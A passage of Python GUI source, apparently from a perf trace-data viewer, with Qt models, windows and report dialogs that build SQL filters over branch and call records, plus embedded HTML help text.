def DisplayData(self, item, index):
if item.level == 1:
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = BranchLevelOneItem(self.glb, self.populated, data, self.root)
self.root.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.root.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.root.child_count += count
self.endInsertRows()
self.progress.emit(self.root.child_count)
def FetchMoreRecords(self, count):
current = self.root.child_count
if self.more:
self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
# Report Variables
class ReportVars():
def __init__(self, name = "", where_clause = "", limit = ""):
self.name = name
self.where_clause = where_clause
self.limit = limit
def UniqueId(self):
return str(self.where_clause + ";" + self.limit)
# Branch window
class BranchWindow(QMdiSubWindow):
def __init__(self, glb, event_id, report_vars, parent=None):
super(BranchWindow, self).__init__(parent)
model_name = "Branch Events " + str(event_id) + " " + report_vars.UniqueId()
self.model = LookupCreateModel(model_name, lambda: BranchModel(glb, event_id, report_vars.where_clause))
self.view = QTreeView()
self.view.setUniformRowHeights(True)
self.view.setModel(self.model)
self.ResizeColumnsToContents()
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model.root)
self.fetch_bar = FetchMoreRecordsBar(self.model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name + " Branch Events")
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extremely slow
# so implement a crude alternative
mm = "MM" if column else "MMMM"
font = self.view.font()
metrics = QFontMetrics(font)
max_width = 0
for row in xrange(n):
val = self.model.root.child_items[row].data[column]
width = metrics.width(str(val) + mm)
max_width = max(width, max_width)
val = self.model.columnHeader(column)
width = metrics.width(str(val) + mm)
max_width = max(width, max_width)
self.view.setColumnWidth(column, max_width)
def ResizeColumnsToContents(self):
n = min(self.model.root.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.model.columnCount()
for i in xrange(columns):
self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Line edit data item
class LineEditDataItem(object):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
self.glb = glb
self.label = label
self.placeholder_text = placeholder_text
self.parent = parent
self.id = id
self.value = default
self.widget = QLineEdit(default)
self.widget.editingFinished.connect(self.Validate)
self.widget.textChanged.connect(self.Invalidate)
self.red = False
self.error = ""
self.validated = True
if placeholder_text:
self.widget.setPlaceholderText(placeholder_text)
def TurnTextRed(self):
if not self.red:
palette = QPalette()
palette.setColor(QPalette.Text,Qt.red)
self.widget.setPalette(palette)
self.red = True
def TurnTextNormal(self):
if self.red:
palette = QPalette()
self.widget.setPalette(palette)
self.red = False
def InvalidValue(self, value):
self.value = ""
self.TurnTextRed()
self.error = self.label + " invalid value '" + value + "'"
self.parent.ShowMessage(self.error)
def Invalidate(self):
self.validated = False
def DoValidate(self, input_string):
self.value = input_string.strip()
def Validate(self):
self.validated = True
self.error = ""
self.TurnTextNormal()
self.parent.ClearMessage()
input_string = self.widget.text()
if not len(input_string.strip()):
self.value = ""
return
self.DoValidate(input_string)
def IsValid(self):
if not self.validated:
self.Validate()
if len(self.error):
self.parent.ShowMessage(self.error)
return False
return True
def IsNumber(self, value):
try:
x = int(value)
except:
x = 0
return str(x) == value
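# Note: the str(x) == value comparison in IsNumber() also rejects forms
# like "01" or " 1" that int() alone would accept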
# Non-negative integer ranges dialog data item
class NonNegativeIntegerRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
super(NonNegativeIntegerRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
self.column_name = column_name
def DoValidate(self, input_string):
singles = []
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if "-" in value:
vrange = value.split("-")
if len(vrange) != 2 or not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
return self.InvalidValue(value)
ranges.append(vrange)
else:
if not self.IsNumber(value):
return self.InvalidValue(value)
singles.append(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
if len(singles):
ranges.append(self.column_name + " IN (" + ",".join(singles) + ")")
self.value = " OR ".join(ranges)
# Positive integer dialog data item
class PositiveIntegerDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
super(PositiveIntegerDataItem, self).__init__(glb, label, placeholder_text, parent, id, default)
def DoValidate(self, input_string):
if not self.IsNumber(input_string.strip()):
return self.InvalidValue(input_string)
value = int(input_string.strip())
if value <= 0:
return self.InvalidValue(input_string)
self.value = str(value)
# Dialog data item converted and validated using a SQL table
class SQLTableDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, table_name, match_column, column_name1, column_name2, parent):
super(SQLTableDataItem, self).__init__(glb, label, placeholder_text, parent)
self.table_name = table_name
self.match_column = match_column
self.column_name1 = column_name1
self.column_name2 = column_name2
def ValueToIds(self, value):
ids = []
query = QSqlQuery(self.glb.db)
stmt = "SELECT id FROM " + self.table_name + " WHERE " + self.match_column + " = '" + value + "'"
ret = query.exec_(stmt)
if ret:
while query.next():
ids.append(str(query.value(0)))
return ids
def DoValidate(self, input_string):
all_ids = []
for value in [x.strip() for x in input_string.split(",")]:
ids = self.ValueToIds(value)
if len(ids):
all_ids.extend(ids)
else:
return self.InvalidValue(value)
self.value = self.column_name1 + " IN (" + ",".join(all_ids) + ")"
if self.column_name2:
self.value = "( " + self.value + " OR " + self.column_name2 + " IN (" + ",".join(all_ids) + ") )"
# Sample time ranges dialog data item converted and validated using 'samples' SQL table
class SampleTimeRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
self.column_name = column_name
self.last_id = 0
self.first_time = 0
self.last_time = 2 ** 64
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, time FROM samples ORDER BY id DESC LIMIT 1")
if query.next():
self.last_id = int(query.value(0))
self.last_time = int(query.value(1))
QueryExec(query, "SELECT time FROM samples WHERE time != 0 ORDER BY id LIMIT 1")
if query.next():
self.first_time = int(query.value(0))
if placeholder_text:
placeholder_text += ", between " + str(self.first_time) + " and " + str(self.last_time)
super(SampleTimeRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
def IdBetween(self, query, lower_id, higher_id, order):
QueryExec(query, "SELECT id FROM samples WHERE id > " + str(lower_id) + " AND id < " + str(higher_id) + " ORDER BY id " + order + " LIMIT 1")
if query.next():
return True, int(query.value(0))
else:
return False, 0
def BinarySearchTime(self, lower_id, higher_id, target_time, get_floor):
query = QSqlQuery(self.glb.db)
while True:
next_id = int((lower_id + higher_id) / 2)
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
if not query.next():
ok, dbid = self.IdBetween(query, lower_id, next_id, "DESC")
if not ok:
ok, dbid = self.IdBetween(query, next_id, higher_id, "")
if not ok:
return str(higher_id)
next_id = dbid
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
next_time = int(query.value(0))
if get_floor:
if target_time > next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(higher_id)
else:
if target_time >= next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(lower_id)
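# Assuming sample times increase with id, BinarySearchTime() maps a time to
# a sample id: with get_floor it returns the first id at or after
# target_time (used for a range start), otherwise the last id at or before
# it (used for a range end)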
def ConvertRelativeTime(self, val):
mult = 1
suffix = val[-2:]
if suffix == "ms":
mult = 1000000
elif suffix == "us":
mult = 1000
elif suffix == "ns":
mult = 1
else:
return val
val = val[:-2].strip()
if not self.IsNumber(val):
return val
val = int(val) * mult
if val >= 0:
val += self.first_time
else:
val += self.last_time
return str(val)
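# For example, "10ms" is converted to first_time + 10000000 ns, while a
# negative value such as "-10ms" is taken relative to last_time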
def ConvertTimeRange(self, vrange):
if vrange[0] == "":
vrange[0] = str(self.first_time)
if vrange[1] == "":
vrange[1] = str(self.last_time)
vrange[0] = self.ConvertRelativeTime(vrange[0])
vrange[1] = self.ConvertRelativeTime(vrange[1])
if not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
return False
beg_range = max(int(vrange[0]), self.first_time)
end_range = min(int(vrange[1]), self.last_time)
if beg_range > self.last_time or end_range < self.first_time:
return False
vrange[0] = self.BinarySearchTime(0, self.last_id, beg_range, True)
vrange[1] = self.BinarySearchTime(1, self.last_id + 1, end_range, False)
return True
def AddTimeRange(self, value, ranges):
n = value.count("-")
if n == 1:
pass
elif n == 2:
if value.split("-")[1].strip() == "":
n = 1
elif n == 3:
n = 2
else:
return False
pos = findnth(value, "-", n)
vrange = [value[:pos].strip(), value[pos+1:].strip()]
if self.ConvertTimeRange(vrange):
ranges.append(vrange)
return True
return False
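# The dash counting above selects the dash that separates the two bounds,
# which allows negative relative times in either bound, e.g. "-10ms-" or
# "-10ms--5ms"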
def DoValidate(self, input_string):
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if not self.AddTimeRange(value, ranges):
return self.InvalidValue(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
self.value = " OR ".join(ranges)
# Report Dialog Base
class ReportDialogBase(QDialog):
def __init__(self, glb, title, items, partial, parent=None):
super(ReportDialogBase, self).__init__(parent)
self.glb = glb
self.report_vars = ReportVars()
self.setWindowTitle(title)
self.setMinimumWidth(600)
self.data_items = [x(glb, self) for x in items]
self.partial = partial
self.grid = QGridLayout()
for row in xrange(len(self.data_items)):
self.grid.addWidget(QLabel(self.data_items[row].label), row, 0)
self.grid.addWidget(self.data_items[row].widget, row, 1)
self.status = QLabel()
self.ok_button = QPushButton("Ok", self)
self.ok_button.setDefault(True)
self.ok_button.released.connect(self.Ok)
self.ok_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.cancel_button = QPushButton("Cancel", self)
self.cancel_button.released.connect(self.reject)
self.cancel_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.hbox = QHBoxLayout()
#self.hbox.addStretch()
self.hbox.addWidget(self.status)
self.hbox.addWidget(self.ok_button)
self.hbox.addWidget(self.cancel_button)
self.vbox = QVBoxLayout()
self.vbox.addLayout(self.grid)
self.vbox.addLayout(self.hbox)
self.setLayout(self.vbox)
def Ok(self):
vars = self.report_vars
for d in self.data_items:
if d.id == "REPORTNAME":
vars.name = d.value
if not vars.name:
self.ShowMessage("Report name is required")
return
for d in self.data_items:
if not d.IsValid():
return
for d in self.data_items[1:]:
if d.id == "LIMIT":
vars.limit = d.value
elif len(d.value):
if len(vars.where_clause):
vars.where_clause += " AND "
vars.where_clause += d.value
if len(vars.where_clause):
if self.partial:
vars.where_clause = " AND ( " + vars.where_clause + " ) "
else:
vars.where_clause = " WHERE " + vars.where_clause + " "
self.accept()
def ShowMessage(self, msg):
self.status.setText("<font color=#FF0000>" + msg + "</font>")
def ClearMessage(self):
self.status.setText("")
# Selected branch report creation dialog
class SelectedBranchDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Selected Branches"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SampleTimeRangesDataItem(g, "Time ranges:", "Enter time ranges", "samples.id", p),
lambda g, p: NonNegativeIntegerRangesDataItem(g, "CPUs:", "Enter CPUs or ranges e.g. 0,5-6", "cpu", p),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only branches with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only branches with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only branches with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only branches with these DSOs will be included", "dsos", "short_name", "samples.dso_id", "to_dso_id", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only branches with these symbols will be included", "symbols", "name", "symbol_id", "to_symbol_id", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p))
super(SelectedBranchDialog, self).__init__(glb, title, items, True, parent)
# Event list
def GetEventList(db):
events = []
query = QSqlQuery(db)
QueryExec(query, "SELECT name FROM selected_events WHERE id > 0 ORDER BY id")
while query.next():
events.append(query.value(0))
return events
# Is a table selectable
def IsSelectable(db, table, sql = ""):
query = QSqlQuery(db)
try:
QueryExec(query, "SELECT * FROM " + table + " " + sql + " LIMIT 1")
except:
return False
return True
# SQL table data model item
class SQLTableItem():
def __init__(self, row, data):
self.row = row
self.data = data
def getData(self, column):
return self.data[column]
# SQL table data model
class SQLTableModel(TableModel):
progress = Signal(object)
def __init__(self, glb, sql, column_headers, parent=None):
super(SQLTableModel, self).__init__(parent)
self.glb = glb
self.more = True
self.populated = 0
self.column_headers = column_headers
self.fetcher = SQLFetcher(glb, sql, lambda x, y=len(column_headers): self.SQLTableDataPrep(x, y), self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def DisplayData(self, item, index):
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = SQLTableItem(self.populated, data)
self.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.child_count += count
self.endInsertRows()
self.progress.emit(self.child_count)
def FetchMoreRecords(self, count):
current = self.child_count
if self.more:
self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
def columnCount(self, parent=None):
return len(self.column_headers)
def columnHeader(self, column):
return self.column_headers[column]
def SQLTableDataPrep(self, query, count):
data = []
for i in xrange(count):
data.append(query.value(i))
return data
# SQL automatic table data model
class SQLAutoTableModel(SQLTableModel):
def __init__(self, glb, table_name, parent=None):
sql = "SELECT * FROM " + table_name + " WHERE id > $$last_id$$ ORDER BY id LIMIT " + str(glb_chunk_sz)
if table_name == "comm_threads_view":
# For now, comm_threads_view has no id column
sql = "SELECT * FROM " + table_name + " WHERE comm_id > $$last_id$$ ORDER BY comm_id LIMIT " + str(glb_chunk_sz)
column_headers = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "PRAGMA table_info(" + table_name + ")")
while query.next():
column_headers.append(query.value(1))
if table_name == "sqlite_master":
sql = "SELECT * FROM " + table_name
else:
if table_name[:19] == "information_schema.":
sql = "SELECT * FROM " + table_name
select_table_name = table_name[19:]
schema = "information_schema"
else:
select_table_name = table_name
schema = "public"
QueryExec(query, "SELECT column_name FROM information_schema.columns WHERE table_schema = '" + schema + "' and table_name = '" + select_table_name + "'")
while query.next():
column_headers.append(query.value(0))
if pyside_version_1 and sys.version_info[0] == 3:
if table_name == "samples_view":
self.SQLTableDataPrep = self.samples_view_DataPrep
if table_name == "samples":
self.SQLTableDataPrep = self.samples_DataPrep
super(SQLAutoTableModel, self).__init__(glb, sql, column_headers, parent)
def samples_view_DataPrep(self, query, count):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, count):
data.append(query.value(i))
return data
def samples_DataPrep(self, query, count):
data = []
for i in xrange(9):
data.append(query.value(i))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(9)))
for i in xrange(10, count):
data.append(query.value(i))
return data
# Base class for custom ResizeColumnsToContents
class ResizeColumnsToContentsBase(QObject):
def __init__(self, parent=None):
super(ResizeColumnsToContentsBase, self).__init__(parent)
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extremely slow
# so implement a crude alternative
font = self.view.font()
metrics = QFontMetrics(font)
max_width = 0
for row in xrange(n):
val = self.data_model.child_items[row].data[column]
width = metrics.width(str(val) + "MM")
max_width = max(width, max_width)
val = self.data_model.columnHeader(column)
width = metrics.width(str(val) + "MM")
max_width = max(width, max_width)
self.view.setColumnWidth(column, max_width)
def ResizeColumnsToContents(self):
n = min(self.data_model.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.data_model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.data_model.columnCount()
for i in xrange(columns):
self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.data_model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
# Table window
class TableWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, table_name, parent=None):
super(TableWindow, self).__init__(parent)
self.data_model = LookupCreateModel(table_name + " Table", lambda: SQLAutoTableModel(glb, table_name))
self.model = QSortFilterProxyModel()
self.model.setSourceModel(self.data_model)
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.sortByColumn(-1, Qt.AscendingOrder)
self.view.setSortingEnabled(True)
self.ResizeColumnsToContents()
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.data_model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, table_name + " Table")
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.mapFromSource(self.data_model.index(row, 0, QModelIndex())))
else:
self.find_bar.NotFound()
# Table list
def GetTableList(glb):
tables = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "SELECT name FROM sqlite_master WHERE type IN ( 'table' , 'view' ) ORDER BY name")
else:
QueryExec(query, "SELECT table_name FROM information_schema.tables WHERE table_schema = 'public' AND table_type IN ( 'BASE TABLE' , 'VIEW' ) ORDER BY table_name")
while query.next():
tables.append(query.value(0))
if glb.dbref.is_sqlite3:
tables.append("sqlite_master")
else:
tables.append("information_schema.tables")
tables.append("information_schema.views")
tables.append("information_schema.columns")
return tables
# Top Calls data model
class TopCallsModel(SQLTableModel):
def __init__(self, glb, report_vars, parent=None):
text = ""
if not glb.dbref.is_sqlite3:
text = "::text"
limit = ""
if len(report_vars.limit):
limit = " LIMIT " + report_vars.limit
sql = ("SELECT comm, pid, tid, name,"
" CASE"
" WHEN (short_name = '[kernel.kallsyms]') THEN '[kernel]'" + text +
" ELSE short_name"
" END AS dso,"
" call_time, return_time, (return_time - call_time) AS elapsed_time, branch_count, "
" CASE"
" WHEN (calls.flags = 1) THEN 'no call'" + text +
" WHEN (calls.flags = 2) THEN 'no return'" + text +
" WHEN (calls.flags = 3) THEN 'no call/return'" + text +
" ELSE ''" + text +
" END AS flags"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" INNER JOIN comms ON calls.comm_id = comms.id"
" INNER JOIN threads ON calls.thread_id = threads.id" +
report_vars.where_clause +
" ORDER BY elapsed_time DESC" +
limit
)
column_headers = ("Command", "PID", "TID", "Symbol", "Object", "Call Time", "Return Time", "Elapsed Time (ns)", "Branch Count", "Flags")
self.alignment = (Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignLeft)
super(TopCallsModel, self).__init__(glb, sql, column_headers, parent)
def columnAlignment(self, column):
return self.alignment[column]
# Top Calls report creation dialog
class TopCallsDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Top Calls by Elapsed Time"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only calls with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only calls with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only calls with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only calls with these DSOs will be included", "dsos", "short_name", "dso_id", "", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only calls with these symbols will be included", "symbols", "name", "symbol_id", "", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p),
lambda g, p: PositiveIntegerDataItem(g, "Record limit:", "Limit selection to this number of records", p, "LIMIT", "100"))
super(TopCallsDialog, self).__init__(glb, title, items, False, parent)
# Top Calls window
class TopCallsWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, report_vars, parent=None):
super(TopCallsWindow, self).__init__(parent)
self.data_model = LookupCreateModel("Top Calls " + report_vars.UniqueId(), lambda: TopCallsModel(glb, report_vars))
self.model = self.data_model
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.ResizeColumnsToContents()
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name)
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Action Definition
def CreateAction(label, tip, callback, parent=None, shortcut=None):
action = QAction(label, parent)
if shortcut is not None:
action.setShortcuts(shortcut)
action.setStatusTip(tip)
action.triggered.connect(callback)
return action
# Typical application actions
def CreateExitAction(app, parent=None):
return CreateAction("&Quit", "Exit the application", app.closeAllWindows, parent, QKeySequence.Quit)
# Typical MDI actions
def CreateCloseActiveWindowAction(mdi_area):
return CreateAction("Cl&ose", "Close the active window", mdi_area.closeActiveSubWindow, mdi_area)
def CreateCloseAllWindowsAction(mdi_area):
return CreateAction("Close &All", "Close all the windows", mdi_area.closeAllSubWindows, mdi_area)
def CreateTileWindowsAction(mdi_area):
return CreateAction("&Tile", "Tile the windows", mdi_area.tileSubWindows, mdi_area)
def CreateCascadeWindowsAction(mdi_area):
return CreateAction("&Cascade", "Cascade the windows", mdi_area.cascadeSubWindows, mdi_area)
def CreateNextWindowAction(mdi_area):
return CreateAction("Ne&xt", "Move the focus to the next window", mdi_area.activateNextSubWindow, mdi_area, QKeySequence.NextChild)
def CreatePreviousWindowAction(mdi_area):
return CreateAction("Pre&vious", "Move the focus to the previous window", mdi_area.activatePreviousSubWindow, mdi_area, QKeySequence.PreviousChild)
# Typical MDI window menu
class WindowMenu():
def __init__(self, mdi_area, menu):
self.mdi_area = mdi_area
self.window_menu = menu.addMenu("&Windows")
self.close_active_window = CreateCloseActiveWindowAction(mdi_area)
self.close_all_windows = CreateCloseAllWindowsAction(mdi_area)
self.tile_windows = CreateTileWindowsAction(mdi_area)
self.cascade_windows = CreateCascadeWindowsAction(mdi_area)
self.next_window = CreateNextWindowAction(mdi_area)
self.previous_window = CreatePreviousWindowAction(mdi_area)
self.window_menu.aboutToShow.connect(self.Update)
def Update(self):
self.window_menu.clear()
sub_window_count = len(self.mdi_area.subWindowList())
have_sub_windows = sub_window_count != 0
self.close_active_window.setEnabled(have_sub_windows)
self.close_all_windows.setEnabled(have_sub_windows)
self.tile_windows.setEnabled(have_sub_windows)
self.cascade_windows.setEnabled(have_sub_windows)
self.next_window.setEnabled(have_sub_windows)
self.previous_window.setEnabled(have_sub_windows)
self.window_menu.addAction(self.close_active_window)
self.window_menu.addAction(self.close_all_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.tile_windows)
self.window_menu.addAction(self.cascade_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.next_window)
self.window_menu.addAction(self.previous_window)
if sub_window_count == 0:
return
self.window_menu.addSeparator()
nr = 1
for sub_window in self.mdi_area.subWindowList():
label = str(nr) + " " + sub_window.name
if nr < 10:
label = "&" + label
            action = self.window_menu.addAction(label)
            action.setCheckable(True)
            action.setChecked(sub_window == self.mdi_area.activeSubWindow())
            # triggered passes a 'checked' argument; absorb it so nr is not overwritten
            action.triggered.connect(lambda a=None, x=nr: self.setActiveSubWindow(x))
nr += 1
def setActiveSubWindow(self, nr):
self.mdi_area.setActiveSubWindow(self.mdi_area.subWindowList()[nr - 1])
# Help text
glb_help_text = """
<h1>Contents</h1>
<style>
p.c1 {
text-indent: 40px;
}
p.c2 {
text-indent: 80px;
}
</style>
<p class=c1><a href=#reports>1. Reports</a></p>
<p class=c2><a href=#callgraph>1.1 Context-Sensitive Call Graph</a></p>
<p class=c2><a href=#calltree>1.2 Call Tree</a></p>
<p class=c2><a href=#allbranches>1.3 All branches</a></p>
<p class=c2><a href=#selectedbranches>1.4 Selected branches</a></p>
<p class=c2><a href=#topcallsbyelapsedtime>1.5 Top calls by elapsed time</a></p>
<p class=c1><a href=#tables>2. Tables</a></p>
<h1 id=reports>1. Reports</h1>
<h2 id=callgraph>1.1 Context-Sensitive Call Graph</h2>
The result is a GUI window with a tree representing a context-sensitive
call-graph. Expanding a couple of levels of the tree and adjusting column
widths to suit will display something like:
<pre>
Call Graph: pt_example
Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
v- ls
v- 2638:2638
v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
|- unknown unknown 1 13198 0.1 1 0.0
>- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
>- _d_linit_internal ld-2.19.so 1 448152 4.4 11094 5.3
v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
>- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
>- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
>- __libc_csu_init ls 1 10354 0.1 10 0.0
|- _setjmp libc-2.19.so 1 0 0.0 4 0.0
v- main ls 1 8182043 99.6 180254 99.9
</pre>
<h3>Points to note:</h3>
<ul>
<li>The top level is a command name (comm)</li>
<li>The next level is a thread (pid:tid)</li>
<li>Subsequent levels are functions</li>
<li>'Count' is the number of calls</li>
<li>'Time' is the elapsed time until the function returns</li>
<li>Percentages are relative to the level above</li>
<li>'Branch Count' is the total number of branches for that function and all functions that it calls</li>
</ul>
<h3>Find</h3>
Ctrl-F displays a Find bar which finds function names by either an exact match or a pattern match.
The pattern matching symbols are ? for any character and * for zero or more characters.
<h2 id=calltree>1.2 Call Tree</h2>
The Call Tree report is very similar to the Context-Sensitive Call Graph, but the data is not aggregated.
Also the 'Count' column, which would always be 1, is replaced by 'Call Time'.
<h2 id=allbranches>1.3 All branches</h2>
The All branches report displays all branches in chronological order.
Not all data is fetched immediately. More records can be fetched using the Fetch bar provided.
<h3>Disassembly</h3>
Open a branch to display disassembly. This only works if:
<ol>
<li>The disassembler is available. Currently, only Intel XED is supported - see <a href=#xed>Intel XED Setup</a></li>
<li>The object code is available. Currently, only the perf build ID cache is searched for object code.
The default directory ~/.debug can be overridden by setting the environment variable PERF_BUILDID_DIR.
One exception is kcore, where the DSO long name is used (refer to dsos_view on the Tables menu),
or alternatively, set the environment variable PERF_KCORE to the kcore file name.</li>
</ol>
<h4 id=xed>Intel XED Setup</h4>
To use Intel XED, libxed.so must be present. To build and install libxed.so:
<pre>
git clone https://github.com/intelxed/mbuild.git mbuild
git clone https://github.com/intelxed/xed
cd xed
./mfile.py --share
sudo ./mfile.py --prefix=/usr/local install
sudo ldconfig
</pre>
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<h2 id=selectedbranches>1.4 Selected branches</h2>
This is the same as the <a href=#allbranches>All branches</a> report but with the data reduced
by various selection criteria. A dialog box displays available criteria which are AND'ed together.
<h3>1.4.1 Time ranges</h3>
The time ranges hint text shows the total time range. Relative time ranges can also be entered in
ms, us or ns. Also, negative values are relative to the end of trace. Examples:
<pre>
81073085947329-81073085958238 From 81073085947329 to 81073085958238
100us-200us From 100us to 200us
10ms- From 10ms to the end
-100ns The first 100ns
-10ms- The last 10ms
</pre>
N.B. Due to the granularity of timestamps, there could be no branches in any given time range.
<h2 id=topcallsbyelapsedtime>1.5 Top calls by elapsed time</h2>
